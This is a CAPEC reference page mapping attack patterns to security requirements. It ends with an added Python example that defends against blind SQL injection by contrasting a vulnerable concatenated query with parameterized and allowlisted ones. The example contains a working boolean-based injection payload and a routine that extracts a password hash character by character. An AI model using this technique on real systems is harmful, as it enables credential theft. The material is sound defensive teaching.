
CAPEC™


Summary

Common Attack Pattern Enumeration and Classification (CAPEC) is a comprehensive dictionary of known attack patterns that adversaries use to exploit known weaknesses in cyber-enabled capabilities. It can be used by analysts, developers, testers and educators to advance community understanding and enhance defenses. The mapping in this section uses CAPEC List v3.5: each CAPEC attack pattern is listed with the numbered security requirements that address it.

Definitions

Definition (CAPEC ID and attack pattern name), followed by the requirements mapped to it. "(no requirement mapped)" marks a pattern with no requirement assigned on this page.

CAPEC-1. Accessing functionality not properly constrained by ACLs
    096. Set user's required privileges
    264. Request authentication
CAPEC-2. Inducing account lockout
    226. Avoid account lockouts
CAPEC-3. Using leading 'ghost' character sequences to bypass input filters
    173. Discard unsafe inputs
CAPEC-4. Using alternative IP address encodings
    173. Discard unsafe inputs
CAPEC-6. Argument injection
    173. Discard unsafe inputs
    342. Validate request parameters
CAPEC-7. Blind SQL injection
    169. Use parameterized queries
    173. Discard unsafe inputs
CAPEC-11. Cause web server misclassification
    037. Parameters without sensitive data
    040. Compare file format and extension
    320. Avoid client-side control enforcement
CAPEC-12. Choosing message identifier
    181. Transmit data using secure protocols
CAPEC-13. Subverting environment variable values
    046. Manage the integrity of critical files
    265. Restrict access to critical processes
CAPEC-15. Command delimiters
    173. Discard unsafe inputs
CAPEC-16. Dictionary-based password attack
    332. Prevent the use of breached passwords
CAPEC-17. Using malicious files
    041. Scan files for malicious code
    186. Use the principle of least privilege
CAPEC-18. XSS targeting non-script elements
    160. Encode system outputs
    173. Discard unsafe inputs
CAPEC-19. Embedding scripts within scripts
    050. Control calls to interpreted code
    160. Encode system outputs
    173. Discard unsafe inputs
    340. Use octet stream downloads
    344. Avoid dynamic code execution
    349. Include HTTP security headers
CAPEC-20. Encryption brute forcing
    147. Use pre-existent mechanisms
    148. Set minimum size of asymmetric encryption
    149. Set minimum size of symmetric encryption
    150. Set minimum size for hash functions
    223. Uniform distribution in random numbers
    224. Use secure cryptographic mechanisms
    370. Use OAEP padding with RSA
    371. Use GCM Padding with AES
CAPEC-21. Exploitation of trusted identifiers
    174. Transactions without a distinguishable pattern
    178. Use digital signatures
CAPEC-22. Exploiting trust in client
    173. Discard unsafe inputs
    178. Use digital signatures
    320. Avoid client-side control enforcement
CAPEC-23. File content injection
    041. Scan files for malicious code
    046. Manage the integrity of critical files
    186. Use the principle of least privilege
CAPEC-24. Filter failure through buffer overflow
    (no requirement mapped)
CAPEC-25. Forced deadlock
    337. Make critical logic flows thread safe
CAPEC-26. Leveraging race conditions
    337. Make critical logic flows thread safe
CAPEC-27. Leveraging race conditions via symbolic links
    186. Use the principle of least privilege
    337. Make critical logic flows thread safe
CAPEC-28. Fuzzing
    320. Avoid client-side control enforcement
CAPEC-29. Leveraging time-of-check and time-of-use (TOCTOU) race conditions
    337. Make critical logic flows thread safe
CAPEC-30. Hijacking a privileged thread of execution
    337. Make critical logic flows thread safe
CAPEC-31. Accessing/Intercepting/Modifying HTTP cookies
    029. Cookies with security attributes
    174. Transactions without a distinguishable pattern
    181. Transmit data using secure protocols
    342. Validate request parameters
    349. Include HTTP security headers
CAPEC-32. XSS through HTTP query strings
    160. Encode system outputs
    173. Discard unsafe inputs
    342. Validate request parameters
    349. Include HTTP security headers
CAPEC-33. HTTP request smuggling
    348. Use consistent encoding
CAPEC-34. HTTP response splitting
    173. Discard unsafe inputs
    320. Avoid client-side control enforcement
CAPEC-35. Leverage executable code in non-executable files
    046. Manage the integrity of critical files
    186. Use the principle of least privilege
CAPEC-36. Using unpublished interfaces
    264. Request authentication
CAPEC-38. Leveraging/Manipulating configuration file search paths
    046. Manage the integrity of critical files
CAPEC-39. Manipulating opaque client-based data tokens
    026. Encrypt client-side session information
    320. Avoid client-side control enforcement
    328. Request MFA for critical systems
CAPEC-41. Using meta-characters in e-mail headers to inject malicious payloads
    115. Filter malicious emails
    173. Discard unsafe inputs
CAPEC-42. MIME conversion
    262. Verify third-party components
CAPEC-43. Exploiting multiple input interpretation layers
    348. Use consistent encoding
CAPEC-48. Passing local filenames to functions that expect a URL
    160. Encode system outputs
    173. Discard unsafe inputs
CAPEC-49. Password brute forcing
    130. Limit password lifespan
    132. Passphrases with at least 4 words
    133. Passwords with at least 20 characters
    237. Ascertain human interaction
    327. Set a rate limit
CAPEC-60. Reusing session IDs (aka session replay)
    030. Avoid object reutilization
CAPEC-70. Try common usernames and passwords
    142. Change system default credentials
CAPEC-74. Manipulating state
    026. Encrypt client-side session information
    328. Request MFA for critical systems
    329. Keep client-side storage without sensitive data
CAPEC-94. Adversary in the middle (AiTM)
    092. Use externally signed certificates
    181. Transmit data using secure protocols
    224. Use secure cryptographic mechanisms
    336. Disable insecure TLS versions
    373. Use certificate pinning
CAPEC-113. Interface manipulation
    078. Disable debugging events
    154. Eliminate backdoors
CAPEC-114. Authentication abuse
    232. Require equipment identity
    319. Make authentication options equally secure
CAPEC-115. Authentication bypass
    154. Eliminate backdoors
    222. Deny access to the host machine
    228. Authenticate using standard protocols
    264. Request authentication
    319. Make authentication options equally secure
CAPEC-116. Excavation
    077. Avoid disclosing technical information
    078. Disable debugging events
    261. Avoid exposing sensitive information
    325. Protect WSDL files
    339. Avoid storing sensitive files in the web root
    365. Avoid exposing technical information
CAPEC-117. Interception
    181. Transmit data using secure protocols
    224. Use secure cryptographic mechanisms
    336. Disable insecure TLS versions
    338. Implement perfect forward secrecy
CAPEC-122. Privilege abuse
    095. Define users with privileges
    096. Set user's required privileges
    186. Use the principle of least privilege
    265. Restrict access to critical processes
    280. Restrict service root directory
    341. Use the principle of deny by default
CAPEC-123. Buffer manipulation
    157. Use the strict mode
    158. Use a secure programming language
    345. Establish protections against overflows
    350. Enable memory protection mechanisms
CAPEC-124. Shared resource manipulation
    337. Make critical logic flows thread safe
    374. Use of isolation methods in running applications
CAPEC-125. Flooding
    062. Define standard configurations
    072. Set maximum response time
    327. Set a rate limit
CAPEC-129. Pointer manipulation
    157. Use the strict mode
    158. Use a secure programming language
CAPEC-130. Excessive allocation
    062. Define standard configurations
    072. Set maximum response time
    157. Use the strict mode
    160. Encode system outputs
    173. Discard unsafe inputs
    321. Avoid deserializing untrusted data
    327. Set a rate limit
CAPEC-131. Resource leak exposure
    158. Use a secure programming language
CAPEC-137. Parameter injection
    173. Discard unsafe inputs
    342. Validate request parameters
CAPEC-148. Content spoofing
    178. Use digital signatures
    181. Transmit data using secure protocols
    330. Verify Subresource Integrity
CAPEC-151. Identity spoofing
    062. Define standard configurations
    224. Use secure cryptographic mechanisms
    319. Make authentication options equally secure
CAPEC-153. Input data manipulation
    037. Parameters without sensitive data
    160. Encode system outputs
    173. Discard unsafe inputs
    186. Use the principle of least privilege
    320. Avoid client-side control enforcement
    321. Avoid deserializing untrusted data
    342. Validate request parameters
    345. Establish protections against overflows
    348. Use consistent encoding
CAPEC-154. Resource location spoofing
    046. Manage the integrity of critical files
    050. Control calls to interpreted code
    330. Verify Subresource Integrity
CAPEC-155. Screen temporary files for sensitive information
    036. Do not deploy temporary files
CAPEC-161. Infrastructure manipulation
    062. Define standard configurations
    080. Prevent log modification
    266. Disable insecure functionalities
    324. Control redirects
    349. Include HTTP security headers
CAPEC-165. File manipulation
    037. Parameters without sensitive data
    040. Compare file format and extension
    041. Scan files for malicious code
    042. Validate file format
    330. Verify Subresource Integrity
    340. Use octet stream downloads
CAPEC-169. Footprinting
    273. Define a fixed security suite
CAPEC-173. Action spoofing
    349. Include HTTP security headers
CAPEC-175. Code inclusion
    037. Parameters without sensitive data
    050. Control calls to interpreted code
    173. Discard unsafe inputs
CAPEC-176. Configuration/Environment manipulation
    046. Manage the integrity of critical files
    186. Use the principle of least privilege
CAPEC-188. Reverse engineering
    159. Obfuscate code
CAPEC-212. Functionality misuse
    226. Avoid account lockouts
    266. Disable insecure functionalities
    336. Disable insecure TLS versions
CAPEC-216. Communication channel manipulation
    181. Transmit data using secure protocols
    224. Use secure cryptographic mechanisms
    336. Disable insecure TLS versions
CAPEC-224. Fingerprinting
    077. Avoid disclosing technical information
    325. Protect WSDL files
    365. Avoid exposing technical information
CAPEC-227. Sustained client engagement
    023. Terminate inactive user sessions
    025. Manage concurrent sessions
CAPEC-233. Privilege escalation
    035. Manage privilege modifications
    095. Define users with privileges
    186. Use the principle of least privilege
    337. Make critical logic flows thread safe
    341. Use the principle of deny by default
CAPEC-240. Resource injection
    160. Encode system outputs
    173. Discard unsafe inputs
    262. Verify third-party components
CAPEC-242. Code injection
    043. Define an explicit content type
    044. Define an explicit charset
    050. Control calls to interpreted code
    117. Do not interpret HTML code
    160. Encode system outputs
    173. Discard unsafe inputs
    262. Verify third-party components
    344. Avoid dynamic code execution
CAPEC-248. Command injection
    160. Encode system outputs
    169. Use parameterized queries
    173. Discard unsafe inputs
    321. Avoid deserializing untrusted data
    344. Avoid dynamic code execution
CAPEC-272. Protocol manipulation
    224. Use secure cryptographic mechanisms
    336. Disable insecure TLS versions
CAPEC-438. Modification during manufacture
    154. Eliminate backdoors
    155. Application free of malicious code
CAPEC-442. Infected software
    273. Define a fixed security suite
CAPEC-475. Signature spoofing by improper validation
    093. Use consistent certificates
CAPEC-549. Local execution of code
    041. Scan files for malicious code
    273. Define a fixed security suite
CAPEC-554. Functionality bypass
    154. Eliminate backdoors
CAPEC-560. Use of known domain credentials
    132. Passphrases with at least 4 words
    133. Passwords with at least 20 characters
    142. Change system default credentials
    332. Prevent the use of breached passwords
CAPEC-586. Object injection
    321. Avoid deserializing untrusted data
CAPEC-594. Traffic injection
    181. Transmit data using secure protocols
    224. Use secure cryptographic mechanisms
    336. Disable insecure TLS versions
CAPEC-613. WiFi SSID tracking
    247. Hide SSID on private networks
    248. SSID without dictionary words
    254. Change SSID name
CAPEC-619. Signal strength tracking
    249. Locate access points
CAPEC-654. Credential prompt impersonation
    122. Validate credential ownership
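The row for CAPEC-7 (Blind SQL injection) maps to requirements 169 (use parameterized queries) and 173 (discard unsafe inputs). The following Python program is an added example, not code from the page or from CAPEC, showing why both requirements are listed: a boolean-based blind extraction that works against a concatenated query, and the same attack failing against a parameterized query and against an allowlist filter. The table, the sample row, the hex-only allowlist and the function names are assumptions made for the example; the database is an in-memory SQLite instance so it runs offline.

```python
import re
import sqlite3

# Constructed sample data for the example: one account with a fake hex "hash".
SAMPLE_ROWS = [("alice", "deadbeef")]

# Assumed allowlist for usernames (requirement 173): anything else is discarded.
USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")


def make_db():
    """In-memory SQLite database seeded with the constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def user_exists_vulnerable(conn, username):
    """CAPEC-7 precondition: untrusted input concatenated into the SQL text.
    The caller only learns True/False, which is all a blind attack needs."""
    sql = "SELECT COUNT(*) FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone()[0] > 0


def user_exists_parameterized(conn, username):
    """Requirement 169 alone: the value is bound, never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()[0] > 0


def is_safe_username(username):
    """Requirement 173: accept only the allowlist, reject everything else."""
    return USERNAME_RE.fullmatch(username) is not None


def user_exists_hardened(conn, username):
    """Requirements 173 and 169 together: discard input outside the allowlist
    before it reaches the database, then bind the value as a parameter."""
    if not is_safe_username(username):
        return False
    return user_exists_parameterized(conn, username)


def blind_extract_hash(oracle, victim="alice", length=8):
    """Boolean-based blind SQL injection: recover password_hash one hex
    character at a time by asking the yes/no oracle about substr()."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            # Closes the opening quote, appends a condition, and relies on the
            # vulnerable query's own trailing quote to close the last literal.
            payload = f"{victim}' AND substr(password_hash,{pos},1)='{ch}"
            if oracle(payload):
                recovered += ch
                break
        else:
            # No character matched: hash is shorter, or the injection is blocked.
            return recovered
    return recovered


if __name__ == "__main__":
    db = make_db()
    leaked = blind_extract_hash(lambda u: user_exists_vulnerable(db, u))
    blocked = blind_extract_hash(lambda u: user_exists_parameterized(db, u))
    print("concatenated query leaked:", repr(leaked))    # 'deadbeef'
    print("parameterized query leaked:", repr(blocked))  # ''
```

The parameterized function alone stops the extraction because the payload is compared as a literal username and matches nothing; the allowlist in the hardened version is the second layer the row calls for, so that a future query written without placeholders still never sees a quote or a SQL keyword.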